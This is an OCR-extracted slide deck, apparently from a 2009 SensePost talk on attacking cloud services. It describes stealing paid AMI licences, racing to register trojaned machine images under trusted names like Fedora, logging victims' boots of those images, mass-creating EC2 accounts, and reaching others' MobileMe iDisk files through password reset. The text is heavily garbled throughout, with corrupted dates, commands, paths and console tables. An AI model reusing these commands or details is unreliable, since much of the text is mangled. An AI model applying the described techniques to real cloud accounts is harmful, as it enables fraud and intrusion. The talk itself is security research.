ec2-bun _rw-r— r— 1 root root 926 2669-63-11 11:16 pk-I652R3E2RKXY4ZLP7D7DUTY7V2J00WBU.pem 

ec2-bun 

ec2-bun 

ec2-bundLe-vol -d /mnt -k /mnt/pk-F227ID6GTZCJWI74BPL4XFPY3CFA33AX.pem -c /mnt/cert-F227ID6GTZC3WI74BPL4XFPYSCFA33AX.pem -u 956543411044 -r i386 -p biocep image 

ec2-bundLe-vol -d /rant -k /mnt/Dk-L5GI66YF0I4D76IGMCWUDBGDAGK3P7XK.Dem -c /mnt/cert-L5GI66YF0I4D76IGMCWUDBGDAt m -u 936750502090 -r i386 -o imaae 


iroup a L L 



[SensePost-2009] 



<#> 



License Stealing 
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y nk Microsoft Windows Update - Microsoft Internet Explorer 



^JSJ2<J 



File Edit View Favorites Tools Help 




QBack - \*\ \^\ .^ | p Search V Favorites ^ | 5 T ^ 



Address ;§Q http : //update . microsoft . com/windowsupdate/v6/def ault . aspx?ln=en-us 



r 



* Installing Updates 



/ Windows 



Windows Update 



Windows Family Windows 



Windows Update Home 



^J) Install Updates (50) 



Options 

Review your update history 

Restore hidden updates 

Change settings 

FAQ 

Get help and support 

Use administrator options 



Ia The updates are being downloaded and installed 



Installation status: 



Downloading Security Update for Windows Server 2003 (KB924667) (update 4 of 50). ■ ■ done! ^ | 

Downloading Cumulative Security Update for Outlook Express for Windows Server 2003 

(KB929123) (update 5 of 50)... done! 

Downloading Security Update for Windows Media Player 6.4 (KB925398) (update 6 of 50)... 

done! 

Downloading Security Update for Windows Server 2003 (KB926122) (update 7 of 50). . . | — 



Verifying the download: 



Cancel 



I m - 



Windows Update Privacy Statement 



© 2009 Microsoft Corporation. All riahts reserved. Terms of Use 


Trademarks 1 Privacy Statement 




Microsoft 


^JDone 




© Trusted sites 


(fc Start | j 4£ J | g Microsoft Windows U... 




4:30 PM 


■ j 



Why stop there? 



o 



Your 

Customer 



O 



$ 



Amazon 
DevPay 



© 



$ 



O 
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Amazon DevPay " 



AWS 



[neek steal vid] 
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AWS as a single point of failure 



Availability is a huge selling point 

Some DoS attacks cant be stopped.. It's 
simply using the service.. 

But it does need to be considered.. 
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But it is Amazon!! 



■ Distributed Denial Of Service (DDoS) Attacks: AWS API cndpoints arc hosted 
on the same Internet- scale, world class infrastructure that supports the 
Amazon.com retail site. Standard DDoS mitigation techniques such as syn 
cookies and connection limiting arc used. To further mitigate the effect of 
potential DDoS attacks, Amazon maintains internal bandwidth which exceeds its 
provider-supplied Internet bandwidth. 
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DDoS ? Really? 
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and 

• file:///L)sers/haroon/Desktop/Vegas Video/ 
ec2-multilogin/ec2-create-20-release/ec2- 
create-20-proj/ec2-create-20-proj.html 
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Twill Loving! 



[ec2 account creation vid] 



[SensePost-2009] 



<#> 



Scaling Registration? 





3 minutes 



[SensePost - 2009] 



<#> 






3 minutes 



6 minutes 
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§- 



e 



3 minutes 




6 minutes 
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9 mi 



mutes 



Booting EC2 Intanccs Exponentially 



le+12 



le+10 - 



lc-K)8 - 






le+06 - 



10000 



100 







i 1 1 1 1 1 1 r 



794,280,046,581 
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Another way to steal machine time 




ITyou plan to use a shared AMI, review the following table to confirm the AMI is not doing anything malicious. 
Launch Confirmation Process 

i — I 

1 Check the ssh authorized keys file. The only key in the file should be the key you used to launch the AMI. 

2 Check open ports and running services. 

3 Change the root password if is not randomized on startup. For more information on randomizing the root password on startup, see Disable 
Password- Based Logins for Root. 

4 Check if ssh allows root password logins. See Disable Password-Based Logins for Root for more information on disabling root based password logins. 

5 Check whether there are any other user accounts that might allow backdoor entry to your instance. Accounts with super user privileges are particularly 
dangerous. 

6 Verify that all cron jobs are legitimate. 




[SensePost-2009] 



<#> 



Really ? 
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Can we get people to run our image? 



Bundle an image 

Register the image (Amazon assigns it an 
AMI-ID) 

Wait for someone to run it 

Profit! 

Alas.. 
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Can we get people to run our image? 



Created image. part. 113 
Created image. part. 119 
Created image. part. 129 
Created image. part. 121 
Created image. part. 122 
Created image. part. 123 
Created image. part. 124 
Created image. part. 125 
Created image. part. 126 
Created image. part. 127 
Created image. part. 123 
Created image. part. 129 
Created image. part. 139 
Created image. part. 131 
Created image. part. 132 
Created image. part. 133 
Created image. part. 134 
Created image. part. 135 
Created image. part. 136 
Created image. part. 137 
Created image. part. 133 
Created image. part. 139 
Created image. part. 149 
Generating digests for each part. 
Digests generated. 



UMUULC ■-■_■ 1CUU LMJ-LUML-r: |||C L-LI — \AVA L-L- 

Creating bundle manifest... 
ec2-bundle-vol complete. 
[rootGdomU-12-31-39-00-B2-17 -]# 



Can we get people to run our image? 



Bundle an image 

Register the image (Amazon assigns it an 
AMI-ID) 

Wait for someone to run it 

Profit! 

Alas.. 
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Register image, too high, race, top5 

file:///Users/haroon/Desktop/Vegas_Video/ 
aws-race/aws-race-release/aws-race- 
proj.html 
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AMI creation 



[registration racing vid] 
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S3 + Image names are going to set off 
another name grab! 

Register image as Fedora ? 



[root@ec2box] # ec2-upload-bundle -b Fedora - 
m /tmp/image.manifest.xml -a secret -s 
secret 

ERROR: Error talking to S3: 
Server.AccessDenied(403): Only the bucket owner 
can access this property 
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[root@ec2box] # ec2-upload-bundle -b 
fedora_core -m /tmp/image.manifest.xml -a 
secret -s secret 

ERROR: Error talking to S3: 
Server.AccessDenied(403): Only the bucket owner 
can access this property 
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[root@ec2box] # ec2-upload-bundle -b redhat - 
m /tmp/image.manifest.xml -a secret -s 
secret 

ERROR: Error talking to S3: 
Server.AccessDenied(403): Only the bucket owner 
can access this property 
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[root@ec2box] # ec2-upload-bundle -b 
fedora_core_ll -m /tmp/image.manifest.xml 
-a secret -s secret 

Creating Bucket... 
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WS Management Co nsoi 



I https://consoie.aws, amazon,conn/ec2/home#c=EC2&s=lmagps 




I Home > Resources > A.WS Management Console BOA > Amazon EC2 



Welcome, Bob Smith | Settings I S :gn Out 



Amazon EC2 



Amazon Elastic 
MapRecfuoe 



Amazon 

CloudFront 




Amazon Machine Images 



> EC2 Dashboard 



INSTANCES 



> Instances 

IMAGES 

> AMIs 

> Bundle Tasks 
ELASTIC BLOCK STORE 

> Volumes 

> Snapshots 
NETWORKING & SECURITY 

> Elastic EPS 

> Security Groups 

> Key Pairs 





li Register New AMI 




Q3 ShcwdHlde rg Refresh 1 


4 Help 




View 


Ina* ' All Images i-aJ( a" Mufnnnt ~* 




1 to 50 Of Z767 AMIS 


> >l 












AMI ID 


Manifest 


Visibility 


Platform 






D 


jHanni-0022c769 


level 22-ec 2-i mages/u buntu -7- 04-fei sty-bas e-20O71 22&a . man if esLxm I 


P ..ib lie 


-0 Ubuntu 


m 


D 


^lami-005db9G9 


al es tic-64/ubuntu-8, Q4-hardy-base-&4-200G 1 222 . manif esLxml 


Pjblic 


^Uburtu 






D 


i£\ ami-0G5dba69 


ruu il d er-on 1 i n e/n ew-ex am pi e- 1 -x86_64_201 33. i mg. man ifest.xm I 


Pjblic 


/\ Other Linux 






D 


\^\ anni-DO&BbaSS 


kaa v o-nt ier-d b/i mod -nt ier-32 bit -f C-DB . m a n if est . x m I 


Public 


/\ Othe.^ Linux 






□ 


^ami-0Oe7(H)69 


at>am i/i mage, m a nifest . x ml 


Public 


(\ Other Linux 






a 


^jami-Q111fG6B 


prod-ec 2-i mages/pri v ate_mslall-Jul24-2009. m artifest xml 


HjLIiC 


i\ Other Linux 






D 


0jami-Q111f76B 


y ale'Vld Whadoop-ul 1 9. 1 -x&& = &4. m ariifest . x ml 


Pjblic 


f\ Othe- Linux 


w 


D 


a5ami-0113fe6S 


dtrix-c3-lab/XenApp5,Q,_32b*t_v1 . 1 .manifest.* ml 


Pjblic 


J5* Windows 







^jami-0l2lcG&B 


qscan/i mage, m anifest . x ml 


Private 


a Other Linux 




a 


jjamW>123c288 


fedora 1 1 f u I l/i mage, m ani f es t .. x ml 


Public 


Q Fedora 






a 


^jjami-D129cc&e 


cer-64-c gntos 5 1 0- IV i m ag&. rn an ifost . k rn 1 


Public 


i* ContOS 




E 


rf)ami-014daeee 


am i a 1 u ri urn c om/i mage^bu nd les/ F &dora6_Jetty _0pen BD/imaoe . manif e 


Public 


Q Fedora 




a 


^jami-Q15abt&e 


jumpbox-cloud-gear/wordpress-1 . 1 .S.manifesLxml 


Public 


(\ Other Linux 






o 


jjami-OIScba&e 


jumpbox-c loud-oear/d rupal -1.1.12. man if eat.xm I 


Pjblic 


P\ Oth e r Linux 




D 


ijj l amH015db968 


al es tic-64/ubuntu-e. 04-hardyrights cai e-64-2G08 1 222 . man if esLxm 1 


Public 


Ubuntu 






D 


jflami-QISdba&B 


rbuitder-on 1 ioe/n ew-exam pi e- 1 -x&6_20 1 34 . i mg. m anifest . x ml 


Pjblic 


(\ Othef Linux 






D 


£jami-0164e3&B 


rtauilder-onlin&'dj-flatpress-l-xSo" 64 19S55.img.manifesLxml 


Public 


(\ Other Linux 






a 


an-i-i;i7^0^t>ti 


al&sti&'uburtu-a. *LVintrepd^&5ktop-2M&06l4. manifest. xml 


Pjblic 


'0 Ubuntu 


y 


B 


J] ami -01 749368 


&i xs q-s 1 ipstream-i m ages/Ex a m pi es/Apache/apache/cd4aeB56-27b 1 -4< 


Public 


^V Other Linux 


j 
* 





t£ 2003 - 2009. Amazon Web Services LLC or its affiliates. All richt reserved- 



Privacy Policy 



Terms of Use 



An ainaion.cc in loni^-iy 



[SensePost-2009] 



<#> 



[haroon@bl.Qwf ish ~]$ tail -f /var/Log/httpd-ssL_i 

[Wed Jul 15 15:02:09 2009] [client 75.101.178.184] 

[Wed Jul 15 15:04:47 2009] [client 75.101.178.184] 

[Wed Jul 15 15:04:56 20091 fclient 75.101.178.1841 



ja L/www/data-ss L/EC2_iriAGE_B00TED 
oca L/www/data-ss L/EC2_iriAGE_BQQTED 
oca L/www/data-33 L/EC2_inAGE_KILLED 
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New Mistake, Old Mistake 



Amazon Web Services Security 



iD-D7-2DDB P 11:30 AM 



eeledue o 

Junior Member 
Fog 

'l Blocking outbound connections 

Is there a way to block outgoing conrn 
be blocked except those specifically m 

I've looked over the (scanty) EC2 doci 
concerned only with incoming traffic. " 



-10-07-200B, 11:99 AM 



Ed d yys q 



Member 
Stratocumulus 



Why are you trying to block outbound 
reason I could think of off the top of n 
quite know the answer. 



Eddyys 



administer EC2 hosts, their privileges on and access to the bastion hosts arc 
revoked. 

Guest Operating System: Virtual instances arc completely controlled by the 
customer. They have full root access and all administrative control over 
additional accounts, services, and applications. AWS administrators do not have 
access to customer instances, and cannot log into the guest OS. Customers should 
disable password-based access to their hosts and utilize token or key-based 
authentication to gain access to unprivileged accounts. Further, customers should 
employ a privilege escalation mechanism with logging on a peruser basis. For 
example, if the guest OS is Linux, utilize SSH with keys to access the virtual 
instance, enable shell command- line logging, and use the s sudo' utility for 
privilege escalation. Customers should generate their own key pairs in order to 
guarantee that they arc unique, and not shared with other customers or with AWS. 
Firewall: Amazon EC2 provides a complete firewall solution; this mandatory 
inbound firewall is configured in a default deny mode and the Amazon EC2 
customer must explicitly open any ports to allow inbound traffic. The traffic may 
be restricted by protocol, by service port, as well as by source IP address 
(individual IP or CIDR block). 



d Tools w Display Modes ▼ 



Join Date: 5ep 2QQE3 

Location: Vancouver; BC Canada 

Posts: 5 



>ts that all outbound ports 
roups seem to be 



Join Date: Oct 2009 
Posts: 45 



to do this. The only 
Jso, I am sorry I don't 
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Mobile me 



Apple sneaks into the cloud 

Makes sense long term, your music, video, 
* are belong to Steve Jobs 

Insidious 

iDisk, iMail, iCal, findmyPhone 
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Hacked by. 



MobifeMe - iDisk 



ft + http: // id isk. mac.com/charlvanderwalt- Pu bl ic?view=web 




eoo 



http://idisk. rnac.com/ bobthecat-Pu bl ic?view= web 



M + 



ft + 



http:// id isk. mac.com/ bobthecat-Pjblic?view= web 



<sH (Q* 



Google 



^, 



Account Error: Inactive 



r^igiilh"^ 



Used OM, LS CB available 



eoo 



MobileMe - iDisk 



http: // id isk. mac.com/steve-Pu bl ic?view= web 




OH+) 



Back/ Forward iDisk Home 
steve"? Public Folder 



■Disk 



® © 

New Folder Upload 



Name 



rir^iistT^ 



a Date Modified 




Size 



Account password reset 



A hard problem to solve in the cloud.. 
Forgot password -> Nick 
All dressed up and nowhere to go? 
Is everyone as "easy" as Nick? 



[SensePost-2009] 



<#> 



and so? 



Told ya it was insidious.. 

We have been going lower and lower with 
trojans now living in firmware 

Will we notice the trojans so high up in the 
stack that follow us everywhere? 

We all looked down on XSS initially 
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Conclusions 



There are new problems to be solved (and some new solutions to 
old problems) with computing power on tap. 

Marrying infrastructure to web applications means that your 
enterprise now faces risks from both infrastructure dodgyness and 
bad web application code. 

Even if marrying *aaS to web applications makes sense, tying them 
to Web2.0 seems like a bad idea. 

Auditors need to start considering the new risks the new paradigm 
brings: 

• (negative) One more set of problems scanners cant find 

• (positive) job security++ 

Computationally difficult is easily within reach of anyone with a 
Credit Card. 

We are getting moved into the cloud even if we don't know it. 
(Making us vulnerable to the "lame attacks" even if we don't rate 
them) 

Transparency and testing are going to be be key.. 

WOZ is cool... 
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Questions ? 

(Videos/Slides/Tools) 

http://www.sensepost.com/blog/ 

research@sensepost.com 
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